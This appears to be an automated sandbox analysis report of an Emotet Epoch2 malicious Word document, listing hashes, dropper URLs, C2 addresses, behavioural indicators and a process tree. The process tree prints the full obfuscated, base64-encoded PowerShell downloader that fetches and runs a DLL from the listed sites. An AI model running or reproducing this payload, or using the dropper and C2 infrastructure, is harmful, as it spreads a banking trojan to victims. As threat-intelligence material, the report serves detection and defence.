emotet | 616f225c95d629abcbed5b0326f80549cd8519f657ab6086a9fa79f009d02f9a

General

Target

januari-05-041480-2021.doc
Size

170KB
MD5

c9b64586c8b3df4596dd1ef21cd2a436
SHA1

a0c4ee3f775fd7120cc67f185f5776db5e1826fe
SHA256

616f225c95d629abcbed5b0326f80549cd8519f657ab6086a9fa79f009d02f9a
SHA512

ad4cf4be919fdd07b13330bde557b76bf82b002a8e0bb66eb574c99acfe588057f4be05347655007eedf7ccc9a0779742cd1188de3c798564389a1acbc74e4f8

Score

10^/10

emotet epoch2 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://fathekarim.com/images/jiC/

exe.dropper

https://trumpcommunity.com/usa-no-uykjh/wcS/

exe.dropper

https://comunicacaovertical.com.br/agencia/D0sJl/

exe.dropper

http://datawyse.net/5VGI0/

exe.dropper

http://transfersuvan.com/wp-admin/1114R/

exe.dropper

http://upafrique.com/cgi-bin/iFmg/

exe.dropper

https://radioclype.scola.ac-paris.fr/wp-admin/js/widgets/6S/

Extracted

Family

emotet

Botnet

Epoch2

C2

90.160.138.175:80

74.222.117.42:80

157.245.123.197:8080

50.116.111.59:8080

173.249.20.233:443

200.116.145.225:443

142.112.10.95:20

87.106.139.101:8080

173.70.61.180:80

75.177.207.146:80

121.124.124.40:7080

98.109.133.80:80

37.187.72.193:8080

74.40.205.197:443

220.245.198.194:80

197.211.245.21:80

123.176.25.234:80

194.190.67.75:80

78.188.225.105:80

217.20.166.178:7080

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1644 1804 cmd.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	1804	cmd.exe

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exerundll32.exe

flow	pid	process
8	1764	powershell.exe
10	1764	powershell.exe
12	1764	powershell.exe
14	1764	powershell.exe
16	1764	powershell.exe
18	1764	powershell.exe
20	1764	powershell.exe
22	1528	rundll32.exe

Loads dropped DLL 4 IoCs

Processes:

rundll32.exe

pid process

1632 rundll32.exe
1632 rundll32.exe
1632 rundll32.exe
1632 rundll32.exe

pid	process
1632	rundll32.exe
1632	rundll32.exe
1632	rundll32.exe
1632	rundll32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Cianveyzszgsvvv\cfvgcxskfnpejy.ntu	rundll32.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1972 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exerundll32.exe

pid process

1764 powershell.exe
1764 powershell.exe
1528 rundll32.exe
1528 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1764 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1972 WINWORD.EXE
1972 WINWORD.EXE

pid	process
1972	WINWORD.EXE

pid	process
1764	powershell.exe
1764	powershell.exe
1528	rundll32.exe
1528	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	1764	powershell.exe

pid	process
1972	WINWORD.EXE
1972	WINWORD.EXE

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exeWINWORD.EXE

description	pid	process	target process
PID 1644 wrote to memory of 792	1644	cmd.exe	msg.exe
PID 1644 wrote to memory of 792	1644	cmd.exe	msg.exe
PID 1644 wrote to memory of 792	1644	cmd.exe	msg.exe
PID 1644 wrote to memory of 1764	1644	cmd.exe	powershell.exe
PID 1644 wrote to memory of 1764	1644	cmd.exe	powershell.exe
PID 1644 wrote to memory of 1764	1644	cmd.exe	powershell.exe
PID 1764 wrote to memory of 1964	1764	powershell.exe	rundll32.exe
PID 1764 wrote to memory of 1964	1764	powershell.exe	rundll32.exe
PID 1764 wrote to memory of 1964	1764	powershell.exe	rundll32.exe
PID 1964 wrote to memory of 1632	1964	rundll32.exe	rundll32.exe
PID 1964 wrote to memory of 1632	1964	rundll32.exe	rundll32.exe
PID 1964 wrote to memory of 1632	1964	rundll32.exe	rundll32.exe
PID 1964 wrote to memory of 1632	1964	rundll32.exe	rundll32.exe
PID 1964 wrote to memory of 1632	1964	rundll32.exe	rundll32.exe
PID 1964 wrote to memory of 1632	1964	rundll32.exe	rundll32.exe
PID 1964 wrote to memory of 1632	1964	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 1528	1632	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 1528	1632	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 1528	1632	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 1528	1632	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 1528	1632	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 1528	1632	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 1528	1632	rundll32.exe	rundll32.exe
PID 1972 wrote to memory of 2008	1972	WINWORD.EXE	splwow64.exe
PID 1972 wrote to memory of 2008	1972	WINWORD.EXE	splwow64.exe
PID 1972 wrote to memory of 2008	1972	WINWORD.EXE	splwow64.exe
PID 1972 wrote to memory of 2008	1972	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\januari-05-041480-2021.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2008

C:\Windows\system32\cmd.exe
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQBUAEUAbQAgACAAdgBBAFIAaQBBAGIAbABFADoAQwBnAEkAagBhACAAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAdABFACcALAAnAHMAeQBzACcALAAnAGkATwAuAGQASQByAGUAQwBUAG8AcgBZACcALAAnAG0ALgAnACkAIAApACAAOwAkADcAagBhAEQAPQAgACAAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsANAB9AHsANgB9AHsAMQB9AHsANQB9ACIAIAAtAGYAJwBjACcALAAnAG4AVABNAGEAbgBBAGcAZQAnACwAJwBzAHkAUwBUAEUAJwAsACcATQAuAG4AZQBUAC4AcwBFAFIAdgBJACcALAAnAGUAUABvACcALAAnAFIAJwAsACcASQAnACkAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlACcAKwAnAG4AdAAnACkAKwAnAGwAeQAnACsAKAAnAEMAbwAnACsAJwBuACcAKQArACcAdABpACcAKwAoACcAbgB1ACcAKwAnAGUAJwApACkAOwAkAE8AaQB4ADUAdgAzADIAPQAkAEgANwAzAE0AIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEYAMgAyAEkAOwAkAEkANQA5AFcAPQAoACcASgA0ACcAKwAnADkAWgAnACkAOwAgACQAQwBHAEkAagBBADoAOgAiAEMAUgBFAEEAYABUAGUAYABEAGkAUgBlAGAAQwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBTAEkAbgAnACsAJwBTAGgAJwApACsAKAAnAGYAawAnACsAJwB1ADgAdABTACcAKQArACgAJwBJAG4AVwAnACsAJwBuAHcAJwApACsAJwBzAHAAJwArACgAJwB4ADMAUwBJACcAKwAnAG4AJwApACkAIAAtAEMAUgBlAHAAbABBAEMARQAgACgAJwBTAEkAJwArACcAbgAnACkALABbAEMASABBAFIAXQA5ADIAKQApADsAJABRADUAXwBaAD0AKAAnAFQAJwArACgAJwAxACcAKwAnADkATQAnACkAKQA7ACAAIAAoAEcAZQB0AC0AdgBBAFIASQBBAGIAbABFACAAKAAnADcASgAnACsAJwBBAGQAJwApACAAIAAtAHYAYQBMAFUARQBvAG4ATAAgACkAOgA6ACIAcwBFAEMAdQByAGAAaQBUAGAAWQBwAGAAUgBvAHQAbwBjAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVABfADYASAA9ACgAJwBBACcAKwAoACcANwAnACsAJwA0AEoAJwApACkAOwAkAFgAaQBoADgAZABkAHAAIAA9ACAAKAAnAEEAJwArACgAJwAxACcAKwAnAF8ASAAnACkAKQA7ACQAQwA4ADEAVAA9ACgAJwBEACcAKwAoACcAOAA4ACcAKwAnAEMAJwApACkAOwAkAEQAZQA4ADEANgAzAHkAPQAkAEgATwBNAEUAKwAoACgAKAAnAHgAJwArACcAMwAxAFMAaABmAGsAJwApACsAKAAnAHUAOAAnACsAJwB0ACcAKQArACgAJwB4ADMAMQBXACcAKwAnAG4AdwBzACcAKQArACcAcAAnACsAKAAnAHgAMwAnACsAJwB4ADMAJwApACsAJwAxACcAKQAgAC0AYwByAGUAUABMAEEAYwBlACAAKABbAEMASABBAHIAXQAxADIAMAArAFsAQwBIAEEAcgBdADUAMQArAFsAQwBIAEEAcgBdADQAOQApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAFgAaQBoADgAZABkAHAAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABYADcAMwBVAD0AKAAnAEUANQAnACsAJwA3AEsAJwApADsAJABEADkAZABlAHoAXwBkAD0AKAAoACcAXQBhAG4AJwArACcAdwBbADMAJwApACsAKAAnAHMAOgAvAC8AZgAnACsAJwBhACcAKQArACgAJwB0ACcAKwAnAGgAZQBrACcAKQArACgAJwBhACcAKwAnAHIAaQAnACkAKwAoACcAbQAuACcAKwAnAGMAJwArACcAbwBtAC8AaQBtAGEAJwArACcAZwBlACcAKwAnAHMALwBqACcAKQArACcAaQAnACsAJwBDACcAKwAoACcALwAnACsAJwBAAF0AJwApACsAKAAnAGEAbgB3ACcAKwAnAFsAMwBzADoALwAvACcAKwAnAHQAJwApACsAKAAnAHIAdQBtAHAAYwAnACsAJwBvAG0AbQAnACkAKwAoACcAdQAnACsAJwBuAGkAdAB5ACcAKwAnAC4AJwApACsAKAAnAGMAbwBtAC8AdQAnACsAJwBzACcAKQArACcAYQAnACsAJwAtAG4AJwArACgAJwBvAC0AdQB5AGsAJwArACcAagBoAC8AJwArACcAdwBjACcAKQArACcAUwAnACsAJwAvACcAKwAnAEAAJwArACcAXQBhACcAKwAnAG4AdwAnACsAKAAnAFsAMwBzACcAKwAnADoAJwApACsAJwAvACcAKwAoACcALwBjAG8AbQB1AG4AJwArACcAaQAnACsAJwBjAGEAYwAnACkAKwAoACcAYQBvAHYAZQByAHQAJwArACcAaQAnACsAJwBjACcAKQArACgAJwBhAGwAJwArACcALgBjAG8AbQAnACsAJwAuAGIAJwArACcAcgAvAGEAZwBlACcAKwAnAG4AJwApACsAJwBjAGkAJwArACgAJwBhAC8AJwArACcARAAnACsAJwAwAHMASgBsACcAKQArACcALwAnACsAJwBAACcAKwAoACcAXQBhACcAKwAnAG4AdwAnACkAKwAoACcAWwAzACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBkAGEAdAAnACkAKwAnAGEAJwArACcAdwAnACsAKAAnAHkAJwArACcAcwAnACsAJwBlAC4AbgBlAHQALwAnACsAJwA1ACcAKQArACcAVgAnACsAKAAnAEcAJwArACcASQAwAC8AQABdAGEAbgB3AFsAMwAnACsAJwA6AC8AJwApACsAKAAnAC8AdAByAGEAJwArACcAbgBzACcAKQArACgAJwBmAGUAJwArACcAcgBzACcAKQArACcAdQAnACsAKAAnAHYAYQAnACsAJwBuAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AJwApACsAJwBhAGQAJwArACcAbQAnACsAKAAnAGkAJwArACcAbgAvADEAMQAnACkAKwAoACcAMQAnACsAJwA0AFIAJwApACsAJwAvAEAAJwArACcAXQBhACcAKwAnAG4AdwAnACsAKAAnAFsAMwAnACsAJwA6ACcAKQArACgAJwAvAC8AdQAnACsAJwBwAGEAZgByAGkAJwArACcAcQB1AGUALgBjACcAKQArACcAbwBtACcAKwAnAC8AYwAnACsAKAAnAGcAaQAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAGkARgBtAGcAJwArACcALwAnACkAKwAnAEAAXQAnACsAJwBhAG4AJwArACcAdwBbACcAKwAnADMAcwAnACsAKAAnADoALwAnACsAJwAvAHIAJwApACsAKAAnAGEAZAAnACsAJwBpAG8AJwApACsAJwBjAGwAJwArACgAJwB5ACcAKwAnAHAAZQAuAHMAJwArACcAYwBvAGwAJwApACsAKAAnAGEALgAnACsAJwBhAGMAJwArACcALQBwAGEAcgBpACcAKwAnAHMAJwApACsAKAAnAC4AZgByAC8AdwBwACcAKwAnAC0AYQBkACcAKQArACcAbQAnACsAJwBpACcAKwAoACcAbgAnACsAJwAvAGoAJwApACsAJwBzACcAKwAnAC8AJwArACgAJwB3AGkAZAAnACsAJwBnAGUAJwApACsAKAAnAHQAJwArACcAcwAvADYAJwArACcAUwAvACcAKQApAC4AIgByAEUAcABMAGAAQQBgAEMAZQAiACgAKAAnAF0AJwArACgAJwBhAG4AdwAnACsAJwBbACcAKQArACcAMwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAJwArACgAJwB0ACcAKwAnAHQAcAAnACkAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAbABgAGkAVAAiACgAJABLAF8ANgBIACAAKwAgACQATwBpAHgANQB2ADMAMgAgACsAIAAkAFYAMQA0AEwAKQA7ACQAUAA1ADgASwA9ACgAJwBCACcAKwAoACcAMQBfACcAKwAnAEgAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEYAMgBxADYAeQBvAHoAIABpAG4AIAAkAEQAOQBkAGUAegBfAGQAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAeQBzAHQARQBNAC4AbgBFAHQALgBXAGUAQgBjAGwASQBlAE4AVAApAC4AIgBEAG8AVwBuAGwAYABPAGEAYABkAGAARgBJAEwARQAiACgAJABGADIAcQA2AHkAbwB6ACwAIAAkAEQAZQA4ADEANgAzAHkAKQA7ACQAQwAzADUATwA9ACgAJwBLADQAJwArACcANgBKACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABEAGUAOAAxADYAMwB5ACkALgAiAGwARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMwA3ADIAOQAzACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEQAZQA4ADEANgAzAHkALAAoACcAQwAnACsAJwBvAG4AJwArACgAJwB0ACcAKwAnAHIAJwArACcAbwBsAF8AUgAnACkAKwAoACcAdQAnACsAJwBuAEQATABMACcAKQApAC4AIgBUAE8AYABzAFQAcgBgAEkAbgBHACIAKAApADsAJABLADcAOQBFAD0AKAAnAEcAOAAnACsAJwAyAEsAJwApADsAYgByAGUAYQBrADsAJABJADMANQBEAD0AKAAoACcAWQAnACsAJwAwADMAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATAA0ADgATAA9ACgAKAAnAE8AXwAnACsAJwA3ACcAKQArACcARQAnACkA
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQBUAEUAbQAgACAAdgBBAFIAaQBBAGIAbABFADoAQwBnAEkAagBhACAAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAdABFACcALAAnAHMAeQBzACcALAAnAGkATwAuAGQASQByAGUAQwBUAG8AcgBZACcALAAnAG0ALgAnACkAIAApACAAOwAkADcAagBhAEQAPQAgACAAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsANAB9AHsANgB9AHsAMQB9AHsANQB9ACIAIAAtAGYAJwBjACcALAAnAG4AVABNAGEAbgBBAGcAZQAnACwAJwBzAHkAUwBUAEUAJwAsACcATQAuAG4AZQBUAC4AcwBFAFIAdgBJACcALAAnAGUAUABvACcALAAnAFIAJwAsACcASQAnACkAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlACcAKwAnAG4AdAAnACkAKwAnAGwAeQAnACsAKAAnAEMAbwAnACsAJwBuACcAKQArACcAdABpACcAKwAoACcAbgB1ACcAKwAnAGUAJwApACkAOwAkAE8AaQB4ADUAdgAzADIAPQAkAEgANwAzAE0AIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEYAMgAyAEkAOwAkAEkANQA5AFcAPQAoACcASgA0ACcAKwAnADkAWgAnACkAOwAgACQAQwBHAEkAagBBADoAOgAiAEMAUgBFAEEAYABUAGUAYABEAGkAUgBlAGAAQwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBTAEkAbgAnACsAJwBTAGgAJwApACsAKAAnAGYAawAnACsAJwB1ADgAdABTACcAKQArACgAJwBJAG4AVwAnACsAJwBuAHcAJwApACsAJwBzAHAAJwArACgAJwB4ADMAUwBJACcAKwAnAG4AJwApACkAIAAtAEMAUgBlAHAAbABBAEMARQAgACgAJwBTAEkAJwArACcAbgAnACkALABbAEMASABBAFIAXQA5ADIAKQApADsAJABRADUAXwBaAD0AKAAnAFQAJwArACgAJwAxACcAKwAnADkATQAnACkAKQA7ACAAIAAoAEcAZQB0AC0AdgBBAFIASQBBAGIAbABFACAAKAAnADcASgAnACsAJwBBAGQAJwApACAAIAAtAHYAYQBMAFUARQBvAG4ATAAgACkAOgA6ACIAcwBFAEMAdQByAGAAaQBUAGAAWQBwAGAAUgBvAHQAbwBjAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVABfADYASAA9ACgAJwBBACcAKwAoACcANwAnACsAJwA0AEoAJwApACkAOwAkAFgAaQBoADgAZABkAHAAIAA9ACAAKAAnAEEAJwArACgAJwAxACcAKwAnAF8ASAAnACkAKQA7ACQAQwA4ADEAVAA9ACgAJwBEACcAKwAoACcAOAA4ACcAKwAnAEMAJwApACkAOwAkAEQAZQA4ADEANgAzAHkAPQAkAEgATwBNAEUAKwAoACgAKAAnAHgAJwArACcAMwAxAFMAaABmAGsAJwApACsAKAAnAHUAOAAnACsAJwB0ACcAKQArACgAJwB4ADMAMQBXACcAKwAnAG4AdwBzACcAKQArACcAcAAnACsAKAAnAHgAMwAnACsAJwB4ADMAJwApACsAJwAxACcAKQAgAC0AYwByAGUAUABMAEEAYwBlACAAKABbAEMASABBAHIAXQAxADIAMAArAFsAQwBIAEEAcgBdADUAMQArAFsAQwBIAEEAcgBdADQAOQApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAFgAaQBoADgAZABkAHAAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABYADcAMwBVAD0AKAAnAEUANQAnACsAJwA3AEsAJwApADsAJABEADkAZABlAHoAXwBkAD0AKAAoACcAXQBhAG4AJwArACcAdwBbADMAJwApACsAKAAnAHMAOgAvAC8AZgAnACsAJwBhACcAKQArACgAJwB0ACcAKwAnAGgAZQBrACcAKQArACgAJwBhACcAKwAnAHIAaQAnACkAKwAoACcAbQAuACcAKwAnAGMAJwArACcAbwBtAC8AaQBtAGEAJwArACcAZwBlACcAKwAnAHMALwBqACcAKQArACcAaQAnACsAJwBDACcAKwAoACcALwAnACsAJwBAAF0AJwApACsAKAAnAGEAbgB3ACcAKwAnAFsAMwBzADoALwAvACcAKwAnAHQAJwApACsAKAAnAHIAdQBtAHAAYwAnACsAJwBvAG0AbQAnACkAKwAoACcAdQAnACsAJwBuAGkAdAB5ACcAKwAnAC4AJwApACsAKAAnAGMAbwBtAC8AdQAnACsAJwBzACcAKQArACcAYQAnACsAJwAtAG4AJwArACgAJwBvAC0AdQB5AGsAJwArACcAagBoAC8AJwArACcAdwBjACcAKQArACcAUwAnACsAJwAvACcAKwAnAEAAJwArACcAXQBhACcAKwAnAG4AdwAnACsAKAAnAFsAMwBzACcAKwAnADoAJwApACsAJwAvACcAKwAoACcALwBjAG8AbQB1AG4AJwArACcAaQAnACsAJwBjAGEAYwAnACkAKwAoACcAYQBvAHYAZQByAHQAJwArACcAaQAnACsAJwBjACcAKQArACgAJwBhAGwAJwArACcALgBjAG8AbQAnACsAJwAuAGIAJwArACcAcgAvAGEAZwBlACcAKwAnAG4AJwApACsAJwBjAGkAJwArACgAJwBhAC8AJwArACcARAAnACsAJwAwAHMASgBsACcAKQArACcALwAnACsAJwBAACcAKwAoACcAXQBhACcAKwAnAG4AdwAnACkAKwAoACcAWwAzACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBkAGEAdAAnACkAKwAnAGEAJwArACcAdwAnACsAKAAnAHkAJwArACcAcwAnACsAJwBlAC4AbgBlAHQALwAnACsAJwA1ACcAKQArACcAVgAnACsAKAAnAEcAJwArACcASQAwAC8AQABdAGEAbgB3AFsAMwAnACsAJwA6AC8AJwApACsAKAAnAC8AdAByAGEAJwArACcAbgBzACcAKQArACgAJwBmAGUAJwArACcAcgBzACcAKQArACcAdQAnACsAKAAnAHYAYQAnACsAJwBuAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AJwApACsAJwBhAGQAJwArACcAbQAnACsAKAAnAGkAJwArACcAbgAvADEAMQAnACkAKwAoACcAMQAnACsAJwA0AFIAJwApACsAJwAvAEAAJwArACcAXQBhACcAKwAnAG4AdwAnACsAKAAnAFsAMwAnACsAJwA6ACcAKQArACgAJwAvAC8AdQAnACsAJwBwAGEAZgByAGkAJwArACcAcQB1AGUALgBjACcAKQArACcAbwBtACcAKwAnAC8AYwAnACsAKAAnAGcAaQAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAGkARgBtAGcAJwArACcALwAnACkAKwAnAEAAXQAnACsAJwBhAG4AJwArACcAdwBbACcAKwAnADMAcwAnACsAKAAnADoALwAnACsAJwAvAHIAJwApACsAKAAnAGEAZAAnACsAJwBpAG8AJwApACsAJwBjAGwAJwArACgAJwB5ACcAKwAnAHAAZQAuAHMAJwArACcAYwBvAGwAJwApACsAKAAnAGEALgAnACsAJwBhAGMAJwArACcALQBwAGEAcgBpACcAKwAnAHMAJwApACsAKAAnAC4AZgByAC8AdwBwACcAKwAnAC0AYQBkACcAKQArACcAbQAnACsAJwBpACcAKwAoACcAbgAnACsAJwAvAGoAJwApACsAJwBzACcAKwAnAC8AJwArACgAJwB3AGkAZAAnACsAJwBnAGUAJwApACsAKAAnAHQAJwArACcAcwAvADYAJwArACcAUwAvACcAKQApAC4AIgByAEUAcABMAGAAQQBgAEMAZQAiACgAKAAnAF0AJwArACgAJwBhAG4AdwAnACsAJwBbACcAKQArACcAMwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAJwArACgAJwB0ACcAKwAnAHQAcAAnACkAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAbABgAGkAVAAiACgAJABLAF8ANgBIACAAKwAgACQATwBpAHgANQB2ADMAMgAgACsAIAAkAFYAMQA0AEwAKQA7ACQAUAA1ADgASwA9ACgAJwBCACcAKwAoACcAMQBfACcAKwAnAEgAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEYAMgBxADYAeQBvAHoAIABpAG4AIAAkAEQAOQBkAGUAegBfAGQAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAeQBzAHQARQBNAC4AbgBFAHQALgBXAGUAQgBjAGwASQBlAE4AVAApAC4AIgBEAG8AVwBuAGwAYABPAGEAYABkAGAARgBJAEwARQAiACgAJABGADIAcQA2AHkAbwB6ACwAIAAkAEQAZQA4ADEANgAzAHkAKQA7ACQAQwAzADUATwA9ACgAJwBLADQAJwArACcANgBKACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABEAGUAOAAxADYAMwB5ACkALgAiAGwARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMwA3ADIAOQAzACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEQAZQA4ADEANgAzAHkALAAoACcAQwAnACsAJwBvAG4AJwArACgAJwB0ACcAKwAnAHIAJwArACcAbwBsAF8AUgAnACkAKwAoACcAdQAnACsAJwBuAEQATABMACcAKQApAC4AIgBUAE8AYABzAFQAcgBgAEkAbgBHACIAKAApADsAJABLADcAOQBFAD0AKAAnAEcAOAAnACsAJwAyAEsAJwApADsAYgByAGUAYQBrADsAJABJADMANQBEAD0AKAAoACcAWQAnACsAJwAwADMAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATAA0ADgATAA9ACgAKAAnAE8AXwAnACsAJwA3ACcAKQArACcARQAnACkA
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Shfku8t\Wnwspx3\A1_H.dll Control_RunDLL
3⤵
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Shfku8t\Wnwspx3\A1_H.dll Control_RunDLL
4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cianveyzszgsvvv\cfvgcxskfnpejy.ntu",Control_RunDLL
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1528

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

